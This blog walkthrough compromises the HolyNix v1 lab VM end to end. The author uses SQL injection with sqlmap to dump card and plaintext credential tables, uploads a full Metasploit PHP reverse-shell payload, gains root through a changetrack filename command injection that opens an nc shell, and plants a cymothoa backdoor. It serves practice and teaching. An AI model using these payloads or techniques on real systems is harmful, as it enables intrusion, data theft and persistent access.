Ngabuburit With HolyNix V.1

OK, today I’m trying to play around with HolyNix V.1 while waiting for fasting break time. You may refer to my previous post on where to get HolyNix. You may also find a bunch of walkthroughs / help / cheats, or whatever you want to call them, on how to solve the challenge on Google. But I prefer to solve it by myself. It’s a hell of a lot more phun to solve it yourself than to read another person’s walkthrough. So what do we need here? 1. VMware Player 2. BackTrack 5 3. A brain and a strong desire to finish the challenge.

First thing to do: run the extracted VMware image with VMware Player. Next I check my VMware network addresses to determine the HolyNix network address. Using the ifconfig command, I got this result.
lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:194059 errors:0 dropped:0 overruns:0 frame:0
TX packets:194059 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:137227867 (137.2 MB)  TX bytes:137227867 (137.2 MB)

vmnet1    Link encap:Ethernet  HWaddr 00:50:56:c0:00:01
inet addr:192.168.53.1  Bcast:192.168.53.255
inet6 addr: fe80::250:56ff:fec0:1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:93028 errors:0 dropped:0 overruns:0 frame:0
TX packets:96619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08
inet addr:172.16.4.1  Bcast:172.16.4.255  Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fec0:8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:515 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

OK, now I fire up nmap and try to scan the network. Since the system runs two virtual networks for VMware, I start by scanning vmnet1. With nmap I simply run

root@bt:/# nmap 192.168.53.1/24

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:46 WIT
Nmap scan report for 192.168.53.1
Host is up (0.000023s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
8080/tcp open  http-proxy

Nmap scan report for 192.168.53.129
Host is up (0.0016s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap scan report for 192.168.53.254
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.53.254 are filtered
MAC Address: 00:50:56:E4:DA:28 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 14.29 seconds

Nice, now I know that HolyNix runs on 192.168.53.129, and obviously it runs a web server. I need more information about this server, so I run nmap once again with some options:

nmap -T4 -A -v 192.168.53.129

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:52 WIT
NSE: Loaded 57 scripts for scanning.
Initiating ARP Ping Scan at 15:52
Scanning 192.168.53.129 [1 port]
Completed ARP Ping Scan at 15:52, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:52
Completed Parallel DNS resolution of 1 host. at 15:52, 0.02s elapsed
Initiating SYN Stealth Scan at 15:52
Scanning 192.168.53.129 [1000 ports]
Discovered open port 80/tcp on 192.168.53.129
Completed SYN Stealth Scan at 15:52, 0.10s elapsed (1000 total ports)
Initiating Service scan at 15:52
Scanning 1 service on 192.168.53.129
Completed Service scan at 15:52, 6.02s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.53.129
NSE: Script scanning 192.168.53.129.
Initiating NSE at 15:52
Completed NSE at 15:52, 0.03s elapsed
Nmap scan report for 192.168.53.129
Host is up (0.00060s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.24 - 2.6.25
Uptime guess: 0.181 days (since Mon Aug 22 11:31:40 2011)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.53.129

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Raw packets sent: 1023 (46.424KB) | Rcvd: 1023 (42.564KB)

Well, from this information we know that it runs an Apache server with PHP and the Suhosin patch. Nice! Let’s open the server in a browser and see what information we can get from it.

What we find here is a login form with two inputs. Basically, a normal pentester will try SQLi on the inputs first, so let’s have a try. I start by putting a ' character into both input boxes, and here is what I got.

SQL Error:You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to
use near ''''' at line 1
SELECT * FROM accounts WHERE username=''' AND password='''
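The error above is the classic sign of a query assembled from raw input. As an added example (not code from the write-up or the HolyNix image), the Python/sqlite3 snippet below builds the same statement shape, reproduces the parse error caused by a stray quote, and shows the parameterised form that stops it; the table rows and passwords are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the HolyNix accounts table; rows and passwords are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (cid INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alamo", "constructed-pw-1"), (2, "etenenbaum", "constructed-pw-2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string interpolation, the same shape HolyNix echoes back:
    SELECT * FROM accounts WHERE username='...' AND password='...'"""
    query = f"SELECT * FROM accounts WHERE username='{username}' AND password='{password}'"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.OperationalError as exc:
        # A parser error leaking back to the client is the signal sqlmap keys on.
        return {"authenticated": False, "error": str(exc), "query": query}
    return {"authenticated": bool(rows), "error": None, "query": query}


def login_safe(conn, username, password):
    """Hardened form: the values travel as bound parameters and are never parsed as SQL,
    so a quote in the input is just a character in the password being compared."""
    query = "SELECT * FROM accounts WHERE username=? AND password=?"
    rows = conn.execute(query, (username, password)).fetchall()
    return {"authenticated": bool(rows), "error": None, "query": query}


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "'", "x"))                # unbalanced quote reaches the parser
    print(login_vulnerable(db, "alamo", "' OR '1'='1"))  # tautology, logs in without the password
    print(login_safe(db, "alamo", "' OR '1'='1"))        # same input treated as a literal password
```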

Great, now let’s fire up sqlmap and see what we get.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=a&password=z&Submit_button=Submit" --dbs --risk=3 --level=5
[09:37:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[09:37:49] [INFO] fetching database names
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': 4
[09:37:49] [INFO] the SQL query used returns 4 entries
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': information_schema
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': clients
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': creds
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': mysql
available databases [4]:
[*] clients
[*] creds
[*] information_schema
[*] mysql

HollyNix! It’s vulnerable to SQLi. OK, let’s see what we can get from the accounts table in the clients database.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=a&password=z&Submit_button=Submit" -p password -D clients -T accounts  --dump --risk=3 --level=5
Database: clients
Table: accounts
[29 entries]
+--------------------------------------------+---------------------+-----+--------------------------------+---------+----------+--------------+------------+------------+
| address                                    | CCN                 | cid | email                          | exp     | name     | phone        | surname    | type       |
+--------------------------------------------+---------------------+-----+--------------------------------+---------+----------+--------------+------------+------------+
| 4562 Boundary St:Jacksonville, FL 32216    | 5392 7367 3484 0469 | 1   | BenjaminNLynch@example.org     | 8/2013  | Benjamin | 904-683-8817 | Lynch      | MasterCard |
| 147 Woodland Dr:Schaumburg, IL 60173       | 5453 6102 5739 0358 | 2   | MinervaJBerry@example.org      | 9/2015  | Minerva  | 708-977-4242 | Berry      | MasterCard |
| 2493 Khale St:Myrtle Beach, SC 29577       | 6011 4994 1010 5322 | 3   | LindseyLBowman@example.org     | 12/2011 | Lindsey  | 843-626-8781 | Bowman     | Discover   |
| 3991 Elliott St:Manchester, NH 03101       | 5416 8729 8148 9486 | 4   | JohnPHamblin@example.org       | 3/2013  | John     | 603-627-9587 | Hamblin    | MasterCard |
| 3920 Cherry Camp Rd:Chicago, IL 60620      | 4916 9278 0028 9828 | 5   | OdellJWalters@example.org      | 10/2014 | Odell    | 773-487-5353 | Walters    | Visa       |
| 1378 McDowell St:Columbia, TN 38401        | 4716 4682 6173 7726 | 6   | GaryMMichels@example.org       | 9/2012  | Gary     | 931-381-8814 | Michels    | Visa       |
| 3095 Fort St:Rocky Mount, NC 27801         | 4916 3448 1227 3800 | 7   | RichardMFowler@example.org     | 3/2012  | Richard  | 252-904-5011 | Fowler     | Visa       |
| 3599 Marigold Ln:Fort Lauderdale, FL 33311 | 5104 3306 6868 0320 | 8   | HarrySPineda@example.org       | 11/2012 | Harry    | 305-401-7394 | Pineda     | MasterCard |
| 2665 Timber Oak Dr:Lubbock, TX 79401       | 6011 6457 4242 8259 | 9   | RosemaryLCutshall@example.org  | 1/2012  | Rosemary | 806-200-5571 | Cutshall   | Discover   |
| 4305 Hickory St:Ogden, UT 84401            | 5537 6754 6591 0362 | 10  | MaryECox@example.org           | 5/2013  | Mary     | 801-710-0941 | Cox        | MasterCard |
| 3965 Willis Ave:Daytona Beach, FL 32114    | 4485 6129 3846 3674 | 11  | WinnieMFischer@example.org     | 12/2011 | Winnie   | 386-323-1724 | Fischer    | Visa       |
| 1707 Holden St:San Diego, CA 92103         | 5317 6906 5346 3401 | 12  | FelixDChagnon@example.org      | 1/2013  | Felix    | 619-214-0886 | Chagnon    | MasterCard |
| 1974 Kildeer Dr:Sunrise, FL 33323          | 5191 4153 2070 6524 | 13  | MariaFJones@example.org        | 2/2012  | Maria    | 754-244-8539 | Jones      | MasterCard |
| 1353 Red Bud Ln:Jersey City, NJ 07305      | 6011 3022 5072 3784 | 14  | WilliamGRichardson@example.org | 5/2012  | William  | 862-244-2784 | Richardson | Discover   |
| 4447 Poplar Ln:Hialeah, FL 33012           | 5542 3658 2948 1283 | 15  | RosellaJKendall@example.org    | 3/2013  | Rosella  | 305-504-4951 | Kendall    | MasterCard |
| 4250 Green Acres Rd:Norlina, NC 27563      | 5265 6251 8967 4594 | 16  | CarolannJThompson@example.org  | 11/2012 | Carolann | 252-456-9843 | Thompson   | MasterCard |
| 4011 Randall Dr:Kawaihae, HI 96743         | 4539 1845 7920 4698 | 17  | MarthaCFrost@example.org       | 5/2015  | Martha   | 808-880-6054 | Frost      | Visa       |
| 4253 Hummingbird Way:Cambridge, MA 02141   | 4539 1640 5255 9206 | 18  | ArthurRBailey@example.org      | 3/2012  | Arthur   | 781-994-7119 | Bailey     | Visa       |
| 2759 Hillview St:Cayce, SC 29033           | 5288 7897 3058 6856 | 19  | RhondaRBrown@example.org       | 10/2012 | Rhonda   | 803-794-7513 | Brown      | MasterCard |
| 967 Flinderation Rd:Burr Ridge, IL 61257   | 5576 0624 1325 2886 | 20  | MelvinRWhite@example.org       | 3/2014  | Melvin   | 708-399-3626 | White      | MasterCard |
| 2046 Masonic Dr:Billings, MT 59102         | 5436 9085 7922 0747 | 21  | SaraRPatton@example.org        | 11/2011 | Sara     | 406-630-4475 | Patton     | MasterCard |
| 3203 Quilly Ln:Columbus, OH 43215          | 4716 9173 5435 8725 | 22  | CarlaKWebb@example.org         | 12/2012 | Carla    | 614-499-2955 | Webb       | Visa       |
| 2121 Oakmound Rd:Chicago, IL 60603         | 4916 1431 9917 0062 | 23  | HaroldBWest@example.org        | 2/2014  | Harold   | 773-214-6846 | West       | Visa       |
| 4822 Veltri Dr:Tuntutuliak, AK 99680       | 4916 9129 4596 5953 | 24  | GeorginaEReeves@example.org    | 7/2015  | Georgina | 907-256-5473 | Reeves     | Visa       |
| 4104 Catherine Dr:Fargo, ND 58103          | 6011 6041 8232 5764 | 25  | SteveLStokes@example.org       | 11/2011 | Steve    | 701-238-6553 | Stokes     | Discover   |
| 2536 Public Works Dr:Chattanooga, TN 37408 | 4929 5329 4895 9608 | 26  | LenaKlein@example.org          | 9/2013  | Lena     | 423-313-8160 | Klein      | Visa       |
| 4970 Haven Ln:Lansing, MI 48933            | 4485 9777 7807 3283 | 27  | MichaelMahler@example.org      | 10/2014 | Michael  | 517-652-8204 | Mahler     | Visa       |
| 3160 Carolyns Circle:Dallas, TX 75212      | 5333 8067 9908 8205 | 28  | SandraNussbaum@example.org     | 4/2015  | Sandra   | 214-794-5803 | Nussbaum   | MasterCard |
| 4834 Freed Dr:Stockton, CA 95202           | 4716 1304 2847 6396 | 29  | JessicaDuerr@example.org       | 10/2012 | Jessica  | 209-679-1447 | Duerr      | Visa       |
+--------------------------------------------+---------------------+-----+--------------------------------+---------+----------+--------------+------------+------------+

WOW! It contains tons of clients’ credit card numbers. Nice! Let’s move on to the accounts table in the creds database and see what we get.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=a&password=z&Submit_button=Submit" -p password -D creds -T accounts  --dump --risk=3 --level=5
Database: creds
Table: accounts
[11 entries]
+-----+--------------------+--------+------------+
| cid | password           | upload | username   |
+-----+--------------------+--------+------------+
| 1   | Ih@cK3dM1cR05oF7   | 0      | alamo      |
| 2   | P3n7@g0n0wN3d      | 1      | etenenbaum |
| 3   | d15cL0suR3Pr0J3c7  | 1      | gmckinnon  |
| 4   | Ik1Ll3dNiN@r315er  | 1      | hreiser    |
| 5   | p1@yIngW17hPh0n35  | 1      | jdraper    |
| 6   | @rR35t3D@716       | 1      | jjames     |
| 7   | m@k1nGb0o7L3g5     | 1      | jljohansen |
| 8   | wH@7ar37H3Fed5D01n | 1      | kpoulsen   |
| 9   | f@7H3r0FL1nUX      | 0      | ltorvalds  |
| 10  | n@5aHaSw0rM5       | 1      | mrbutler   |
| 11  | Myd@d51N7h3NSA     | 1      | rtmorris   |
+-----+--------------------+--------+------------+

Oh yeah! Now we have all the user login information, complete with their unencrypted passwords. Now let’s test the usernames and passwords on the login page. I choose alamo and etenenbaum, since they have different values in the upload field.

OK, let’s walk around for a while and check all the menus on the left side. Looks like this user doesn’t have the upload feature. So from here we can tell that the upload field in the DB indicates whether the user has upload ability or not. Let’s give the etenenbaum username a try.

Great! Now let’s take a look at the uploaded file.

Forbidden
You don't have permission to access /~etenenbaum/holynix.png on this server.

Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch Server at 192.168.53.129 Port 80

Oops! Looks like we don’t have access to read the file; it seems the file’s permissions (chmod) were not set correctly. Let’s try another file. This time I will upload a gzip file, since there is a feature in the upload menu that extracts a gzip file automatically. Logically, the gzip will be run by the web server system, so the extracted file should be owned by the web server and be accessible through the browser, since it belongs to the web server system.

As we thought, the system changes the ownership of the file right after it extracts the compressed file. Let’s have a check, let’s open

http://192.168.53.129/~etenenbaum/holynix2.png

And there you go, the image file is successfully accessed through the browser. It’s a good sign: now we can upload our PHP backdoor to the server. I will use Metasploit to generate the backdoor. Metasploit provides several PHP backdoors, from bind type to connect-back type (reverse TCP). I will choose the meterpreter type; although it was built for Windows-based systems, hey, this is my hacking path and I want to try it, so get back! Choose your own backdoor yourself.
Let’s fire up msfconsole and generate a PHP backdoor from it.

       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf >

And here we go!

msf > use payload/php/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
Module options (payload/php/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 192.168.53.1
LHOST > 192.168.53.1
msf payload(reverse_tcp) > set LPORT 5050
LPORT > 5050
msf payload(reverse_tcp) > generate -t raw
#<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '192.168.53.1';
$port = 5050;
if (FALSE !== strpos($ip, ":")) {
    # ipv6 requires brackets around the address
    $ip = "[". $ip ."]";
}
# Pick whichever socket API the PHP build still allows.
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
} else {
    die('no socket funcs');
}
if (!$s) { die('no socket'); }

# First 4 bytes from the handler: big-endian length of the stage that follows.
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
    # We failed on the main socket.  There's no way to continue, so
    # bail
    die();
}

$a = unpack("Nlen", $len);
$len = $a['len'];

# Read the whole stage, looping until all $len bytes have arrived.
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
    case 'stream': $b .= fread($s, $len-strlen($b)); break;
    case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
msf payload(reverse_tcp) >

Just copy the PHP code into a file and save it under whatever name you want; in my case it is temp.php. Don’t forget to add ?> at the end of the code. So we now have a meterpreter backdoor which will connect back to our IP address on port 5050. Next, let’s gzip the file and upload it to the server through the upload menu. On our side, run a listener from Metasploit.

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.53.1
LHOST => 192.168.53.1
msf exploit(handler) > set LPORT 5050
LPORT => 5050
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler...

Now open temp.php on the server through the browser at http://192.168.53.129/~etenenbaum/temp.php
and check our msfconsole to see what happens.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler...
[*] Sending stage (31612 bytes) to 192.168.53.129
[*] Meterpreter session 1 opened (192.168.53.1:5050 -> 192.168.53.129:47191) at 2011-08-23 10:48:24 +0700

meterpreter > 

Nice! The meterpreter backdoor is already running smoothly :). Play around with it for a while; type help for the commands it has. So what next? I already tried running many kernel exploits on it, from A to Z, you name it, but all of them failed. So I once again re-checked the system to see whether I could find any clue. OK, after searching for a while I found two possible ways to get into the system: 1. Changetrack, which has a bug in it, and 2. Knockknock, which is usually used to connect to a system through port knocking. I downloaded the knockknock application from the link provided on the message board and installed it on my system. Next, I read the manual file provided in the installer folder.
Using the meterpreter backdoor, I tried to download the knockknock config from the server to my system. Based on the documentation, the knockknock config files are saved in /etc/knockknock.d/profiles/

meterpreter > cd /etc/knockknock.d/profiles/
meterpreter > pwd
/etc/knockknock.d/profiles
meterpreter > ls

Listing: /etc/knockknock.d/profiles
===================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  alamo
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  etenenbaum
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  gmckinnon
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  hreiser
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jdraper
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jjames
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jljohansen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  kpoulsen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  ltorvalds
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  mrbutler
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  rtmorris

meterpreter > ls alamo

Listing: alamo
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  25    fil   2010-11-09 09:55:45 +0700  cipher.key
100644/rw-r--r--  27    fil   2010-11-09 09:55:45 +0700  config
100644/rw-r--r--  2     fil   2010-11-09 11:12:55 +0700  counter
100644/rw-r--r--  25    fil   2010-11-09 09:55:45 +0700  mac.key

meterpreter > download alamo/cipher.key > /tmp
[*] downloading: alamo/cipher.key -> /tmp
[*] downloaded : alamo/cipher.key -> /tmp/alamo/cipher.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/config > /tmp
[*] downloading: alamo/config -> /tmp
[*] downloaded : alamo/config -> /tmp/alamo/config
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/counter > /tmp
[*] downloading: alamo/counter -> /tmp
[*] downloaded : alamo/counter -> /tmp/alamo/counter
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > download alamo/mac.key > /tmp
[*] downloading: alamo/mac.key -> /tmp
[*] downloaded : alamo/mac.key -> /tmp/alamo/mac.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >

Let’s have a check on the /tmp folder and see whether we successfully downloaded the files. And yes, we have downloaded the files to our system. Next, put the files in the root folder and create a new knockknock client profile; just follow the instructions in the INSTALL file, I will not explain it here. After setting up the application, I try to run knockknock to get access to the server through the ssh port, starting with the alamo user and using the password from our previous DB dump.

root@bt:~/.knockknock# knockknock -p 22 192.168.53.129
*** Success: knock sent.
root@bt:~/.knockknock# ssh -l alamo 192.168.53.129
alamo@192.168.53.129's password:
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
alamo@holynix:~$

Nice! We successfully got into the server through an ssh connection. Let’s gather some information.

alamo@holynix:~$ id
uid=1000(alamo) gid=115(developers) groups=115(developers)
alamo@holynix:~$ ls -al /home/
total 56
drwxr-xr-x 14 root       root       4096 2010-11-08 21:53 .
drwxr-xr-x 21 root       root       4096 2010-11-08 21:09 ..
drwxr-xr-x  2 alamo      developers 4096 2010-11-08 21:47 alamo
drwxrwxr-x 20 nobody     developers 4096 2010-11-08 21:54 development
drwxr-xr-x  2 etenenbaum users      4096 2011-11-19 09:11 etenenbaum
drwxr-xr-x  2 gmckinnon  users      4096 2010-11-08 21:47 gmckinnon
drwxr-xr-x  2 hreiser    staff      4096 2010-11-08 21:47 hreiser
drwxr-xr-x  2 jdraper    users      4096 2010-11-08 21:47 jdraper
drwxr-xr-x  2 jjames     staff      4096 2010-11-08 21:47 jjames
drwxr-xr-x  2 jljohansen developers 4096 2010-11-08 21:47 jljohansen
drwxr-xr-x  2 kpoulsen   users      4096 2010-11-08 21:47 kpoulsen
drwxr-xr-x  3 ltorvalds  admin      4096 2011-11-18 13:25 ltorvalds
drwxr-xr-x  2 mrbutler   staff      4096 2010-11-08 21:47 mrbutler
drwxr-xr-x  2 rtmorris   users      4096 2010-11-08 21:47 rtmorris
alamo@holynix:~$

OK, we’ve got an ace here; let’s wrap everything up. We already know that Changetrack has a bug which leads to privilege escalation. Luckily, user alamo is in the same group (developers) that has access to the changetrack development folder at /home/development. Based on the report, to exploit the Changetrack bug we just need to create a file with the command

touch "<`nc -l -p 5001 -e $SHELL`"

and then run the ls command in that folder. If the plan works as expected, the command line will be executed and it will open a root shell listener (hopefully). Next, just connect to the system on that port. Don’t forget to do the port knocking before connecting through nc.

root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
(UNKNOWN) [192.168.53.129] 5001 (?) : Connection refused
root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

0wn3d! Time to break the fast… Oh wait, for more fun and a real-case scenario, I try to put a backdoor into the system, in case the admin realises that his system has been compromised through the Changetrack bug. I’m using cymothoa, which you can find in your BT 5. I simply copy the compiled (binary) cymothoa file into the /var/www folder, then download it from holynix.

wget http://192.168.53.1/cymothoa
ls
cymothoa
holynix.sql
holynix.sql.1
ps ax
PID TTY      STAT   TIME COMMAND
1 ?        Ss     0:04 /sbin/init
2 ?        S<     0:00 [kthreadd]
3 ?        S<     0:00 [migration/0]
4 ?        S<     0:00 [ksoftirqd/0]
5 ?        S<     0:00 [watchdog/0]
6 ?        S<     0:01 [events/0]
7 ?        S<     0:00 [khelper]
41 ?        S<     0:00 [kblockd/0]
44 ?        S<     0:00 [kacpid]
45 ?        S<     0:00 [kacpi_notify]
176 ?        S<     0:00 [kseriod]
214 ?        S      0:00 [pdflush]
215 ?        S      0:00 [pdflush]
216 ?        S<     0:00 [kswapd0]
258 ?        S<     0:00 [aio/0]
1517 ?        S<     0:00 [ksuspend_usbd]
1522 ?        S<     0:00 [khubd]
1526 ?        S<     0:00 [ata/0]
1531 ?        S<     0:00 [ata_aux]
1626 ?        S<     0:00 [scsi_eh_0]
1869 ?        S<     0:00 [scsi_eh_1]
1871 ?        S<     0:00 [scsi_eh_2]
2636 ?        S<     0:04 [kjournald]
2796 ?        S
3081 ?        S<     0:00 [kgameportd]
3252 ?        S<     0:00 [kpsmoused]
4208 ?        S
4610 tty4     Ss+    0:00 /sbin/getty 38400 tty4
4613 tty5     Ss+    0:00 /sbin/getty 38400 tty5
4619 tty2     Ss+    0:00 /sbin/getty 38400 tty2
4622 tty3     Ss+    0:00 /sbin/getty 38400 tty3
4625 tty6     Ss+    0:00 /sbin/getty 38400 tty6
4659 ?        Ss     0:00 /sbin/syslogd -u syslog
4678 ?        S      0:01 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
4680 ?        Ss     0:00 /sbin/klogd -P /var/run/klogd/kmsg
4699 ?        Ss     0:00 /usr/sbin/sshd
4755 ?        S      0:00 /bin/sh /usr/bin/mysqld_safe
4797 ?        Sl     1:38 /usr/sbin/mysqld --basedir=/usr
--datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
--port=3306 --socket=/var/run/mysqld/mysqld.sock
4798 ?        S      0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
4901 ?        S      1:01 /usr/bin/python /usr/bin/knockknock-daemon
4902 ?        S      0:00 /usr/bin/python /usr/bin/knockknock-daemon
4922 ?        Ss     0:00 /usr/sbin/atd
4933 ?        Ss     0:00 /usr/sbin/cron
4955 ?        Ss     0:05 /usr/sbin/apache2 -k start
4974 tty1     Ss+    0:00 /sbin/getty 38400 tty1
4975 ?        S      0:04 /usr/sbin/apache2 -k start
4977 ?        S      0:03 /usr/sbin/apache2 -k start
4978 ?        S      0:03 /usr/sbin/apache2 -k start
4979 ?        S      0:03 /usr/sbin/apache2 -k start
4981 ?        S      0:03 /usr/sbin/apache2 -k start
5584 ?        S      0:03 /usr/sbin/apache2 -k start
7402 ?        S      0:00 /usr/sbin/apache2 -k start
7403 ?        S      0:00 /usr/sbin/apache2 -k start
7404 ?        S      0:01 /usr/sbin/apache2 -k start
7405 ?        S      0:00 /usr/sbin/apache2 -k start
23643 ?        Z      0:00 [sh]
24856 ?        Ss     0:00 sshd: alamo [priv]
24858 ?        S      0:00 sshd: alamo@pts/0
24859 pts/0    Ss+    0:00 -bash
26707 ?        S      0:00 /USR/SBIN/CRON
26708 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26709 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26714 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
26715 ?        S      0:00 sh
26721 ?        S      0:00 /USR/SBIN/CRON
26722 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26723 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26730 ?        Z      0:00 [cron]
26745 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
26748 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27381 ?        Z      0:00 [cron]
27384 ?        S      0:00 /USR/SBIN/CRON
27385 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
27386 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
